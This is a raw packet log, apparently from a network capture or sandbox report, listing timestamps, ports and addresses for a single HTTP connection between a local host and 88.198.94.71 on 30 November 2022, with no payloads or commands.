Nov 30, 2022 00:10:04.920164108 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920178890 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.920183897 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920203924 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920209885 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.920223951 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920233965 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.920244932 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920258999 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.920264959 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920284986 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920305967 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920305967 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.920326948 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920329094 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.920347929 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920353889 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.920367956 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920377970 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.920388937 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920403957 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.920409918 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920425892 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.920440912 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920463085 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920483112 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920504093 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920507908 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.920507908 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.920525074 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920537949 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.920546055 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920567989 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920587063 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920605898 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.920607090 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920629025 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920634985 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.920650005 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920660019 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.920681000 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.920718908 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920727968 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.920727968 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.920741081 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920768023 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920787096 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920790911 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.920809984 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920830965 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920850992 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920857906 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.920871973 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920886040 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.920892954 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920909882 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.920912981 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920933962 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920938015 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.920954943 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920975924 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.920995951 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921016932 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921016932 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.921016932 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.921016932 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.921036959 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921056986 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921063900 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.921077013 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921087027 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.921097994 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921108007 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.921118975 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921139956 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921152115 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.921159983 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921180964 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921200037 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921219110 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921238899 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921263933 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.921267986 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921288013 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921297073 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.921308041 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921323061 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.921323061 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.921328068 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921346903 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921355963 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.921363115 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921380997 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921400070 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921421051 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921439886 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921461105 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921463966 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.921463966 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.921489000 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921510935 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921513081 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.921530962 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921550035 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.921550989 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921550035 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.921571016 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921588898 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.921588898 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.921591997 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921612978 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921619892 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.921642065 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.921670914 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921691895 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921693087 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.921693087 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.921715975 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921736002 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921762943 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921770096 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.921782017 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921808004 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921828032 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921833992 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.921849966 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921859026 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.921871901 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921884060 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.921894073 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921909094 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.921914101 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921935081 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921953917 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921968937 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.921973944 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.921994925 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.922008038 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.922014952 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.922033072 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.922035933 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.922058105 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.922075033 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.922089100 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.922101021 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.922122955 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.922127962 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.922127962 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.922143936 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.922167063 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.922168970 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.922188044 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.922189951 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.922208071 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.922226906 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.922230959 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.922247887 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.922255993 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.922255993 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.922269106 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.922290087 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.922290087 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.922311068 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.922329903 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.922331095 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.922329903 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.922355890 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.922372103 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.922372103 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.922377110 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.922399044 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.922401905 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.922419071 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.922436953 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.922442913 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.922463894 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.922483921 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.922498941 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.922502995 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.922523022 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.922557116 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.922558069 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.922940969 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.956603050 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.956628084 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.956656933 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.956676006 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.956701994 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.956722975 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.956742048 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.956748009 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.956768990 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.956784010 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.956793070 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.956813097 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.956832886 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.956835032 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.956852913 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.956861019 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.956873894 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.956880093 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.956893921 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.956907034 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.956916094 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.956934929 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.956950903 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.956955910 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.956971884 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.956976891 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.956998110 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.957004070 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.957016945 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.957030058 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.957037926 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.957050085 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.957079887 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.957268953 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.957317114 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.957401991 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.957602024 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.957623005 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.957648039 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.957669020 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.957693100 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.957704067 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.957712889 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.957734108 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.957735062 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.957755089 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.957776070 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.957786083 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.957797050 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.957798004 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.957828999 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.957847118 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.957849979 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.957870960 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.957871914 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.957901955 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.957921028 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.958669901 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.958744049 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.960582018 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.960628033 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.960676908 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.960721970 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.960807085 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.960807085 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.960896015 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.960932970 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.960975885 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.961008072 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.961020947 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.961040974 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.961050034 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.961075068 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.961091995 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.961118937 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.961153030 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.961184978 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.961220026 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.961263895 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.961263895 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.961272001 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.961263895 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.961263895 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.961306095 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.961324930 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.961379051 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.961431980 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.961474895 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.961494923 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.961541891 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.961582899 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.961604118 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.961658955 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.961699963 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.961729050 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.961781979 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.961822033 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.961847067 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.961900949 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.961940050 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.961965084 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.962018967 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.962059021 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.962085962 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.962137938 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.962172985 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.962203979 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.962255001 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.962296009 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.962320089 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.962374926 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.962415934 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.962435961 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.962488890 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.962528944 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.962551117 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.962599039 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.962599993 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.962651968 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.962685108 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.962685108 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.962708950 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.962748051 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.962759018 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.962800026 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.962811947 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.962856054 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.962862968 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.962903023 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.962949038 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.963000059 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.963005066 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.963040113 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.963057995 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.963109016 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.963151932 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.963159084 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.963191986 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.963197947 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.963226080 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.963227034 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.963258982 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.963290930 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.963306904 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.963306904 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.963331938 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.963365078 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.963370085 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.963402987 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.963404894 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.963434935 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.963460922 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.963469028 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.963476896 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.963500023 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.963519096 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.963532925 CET	80	49708	88.198.94.71	192.168.2.7
